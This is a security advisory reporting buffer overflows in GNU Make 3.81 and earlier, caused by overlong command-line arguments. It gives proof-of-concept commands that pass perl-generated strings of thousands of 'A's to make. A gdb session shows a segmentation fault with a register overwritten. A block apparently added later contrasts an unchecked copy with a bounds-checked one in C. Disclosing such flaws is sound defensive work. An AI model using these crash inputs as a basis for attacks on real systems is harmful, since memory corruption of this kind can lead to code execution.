-----------------------------------------------------------------------------------------------------------------------------------------------------
Application: Make <= 3.81
Web Site: http://savannah.gnu.org/projects/make/ &
http://www.gnu.org/software/make/
Platform: Unix
Bug: multiple buffer overflows
-------------------------------------------------------
1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credits
===========
1) Introduction
===========
Make is a tool which controls the generation of executables and other
non-source files of a program from the program's source files.
Make gets its knowledge of how to build your program from a file called the
makefile, which lists each of the non-source files and how to compute it
from other files. When you write a program, you should write a makefile for
it, so that it is possible to use Make to build and install the program.
======
2) Bug
======
Make does not filter any value submitted on the command line, so it is possible to
trigger several exploitable buffer overflows.
=====
3) Proof of concept
=====
Proof of concept example:
make `perl -e 'print"A"x4096'` //***
make -f `perl -e 'print"A"x4096'`
make -j `perl -e 'print"A"x4096'`
make -i `perl -e 'print"A"x4096'`
make -l `perl -e 'print"A"x4096'`
*** Depending on the case, you will need to change the value by adding a few
more A's; increasing it in steps of a hundred should be enough to make sure you trigger it.
root@debian:~# gdb make
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
.................
..........
...
(gdb) run `perl -e 'print"A"x4296'` // my GCC version has stack-smashing
protection, so with 200 more chars we trigger it
Starting program: /usr/bin/make `perl -e 'print"A"x4296'`
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1209637200 (LWP 1246)]
make: stat: AAAAAAAAAAAAAAAAAAAAAAAA....AAAAAAA
AAAAA.........AAAAAAAAAA....
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1209637200 (LWP 1246)]
0x08052ac5 in ?? ()
(gdb) i r
eax 0xbfffa930 -1073764048
ecx 0x0 0
edx 0x0 0
ebx 0x41414141 1094795585 // got overwritten here
esp 0xbfff8570 0xbfff8570
ebp 0xbfffa918 0xbfffa918
esi 0x80868f8 134768888
edi 0x8081560 134747488
eip 0x8052ac5 0x8052ac5 <exit@plt+36461>
eflags 0x10206 [ PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
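To show the class of defect the advisory describes (a command-line value copied into a fixed-size buffer with no length check, which is how saved registers such as ebx end up holding 0x41414141) next to its hardened form, here is an added example. It is not Make's own code; the buffer size, function names and the in-process rebuild of the perl `"A" x len` input are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical fixed-size buffer, standing in for whatever internal buffer
 * the oversized argument lands in (the advisory does not name it). */
#define ARG_BUF_LEN 1024

/* Vulnerable pattern the advisory describes: a command-line value copied
 * into a fixed stack buffer without a bound. Any argument of ARG_BUF_LEN
 * bytes or more overwrites what follows the buffer (a stack-protector canary
 * aborts first, which is why the author needed 200 extra bytes). Shown for
 * comparison only; nothing below calls it. */
void unsafe_copy_arg(const char *arg)
{
    char buf[ARG_BUF_LEN];
    strcpy(buf, arg);                 /* no length check: overflow */
    printf("make: stat: %s\n", buf);
}

/* Hardened form: refuse anything that does not fit including the NUL,
 * leave the buffer untouched on refusal. Returns 0 on success, -1 if rejected. */
int safe_copy_arg(char *buf, size_t buflen, const char *arg)
{
    size_t n = strlen(arg);
    if (buflen == 0 || n >= buflen)
        return -1;
    memcpy(buf, arg, n + 1);
    return 0;
}

/* Rebuilds the advisory's constructed input (len bytes of 'A') in-process and
 * checks that the hardened copy rejects it. Returns 1 if rejected, 0 if
 * accepted, -1 on allocation failure. */
int probe_rejects_oversized(size_t len)
{
    char buf[ARG_BUF_LEN];
    char *arg = malloc(len + 1);
    if (!arg) return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    int rc = safe_copy_arg(buf, sizeof buf, arg);
    free(arg);
    return rc == -1 ? 1 : 0;
}

int main(void)
{
    /* 4096 and 4296 are the lengths used in the proof of concept above. */
    printf("4096 A's rejected: %d\n", probe_rejects_oversized(4096));
    printf("4296 A's rejected: %d\n", probe_rejects_oversized(4296));
    printf("16 A's rejected:   %d\n", probe_rejects_oversized(16));
    return 0;
}
```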
========
4) Greets
========
Deimos,Benjilenoob,team soh, #futurezone, #soh #nibbles
=====
5) Credits
=====
Laurent Gaffié